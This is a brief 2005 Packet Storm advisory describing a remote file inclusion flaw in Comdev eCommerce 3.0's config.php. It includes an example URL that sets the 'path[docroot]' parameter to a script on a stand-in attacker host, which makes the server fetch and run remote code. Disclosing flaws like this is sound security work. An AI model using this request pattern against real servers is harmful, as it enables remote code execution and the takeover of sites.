comdevInclusion.txt

2005-08-06T00:00:00
ID PACKETSTORM:39070
Type packetstorm
Reporter Packet Storm
Modified 2005-08-06T00:00:00

Description

                                        
                                            `Class: Input Validation Error   
Vulnerable: Comdev Comdev eCommerce 3.0   
  
The config.php script can be passed a "path[docroot]" http request parameter to change the location of an included file.  
  
Example:  
  
http://www.vulnerable.com/oneadmin/config.php?path[docroot]=http://www.hacker.com/badscript.php.txt  
`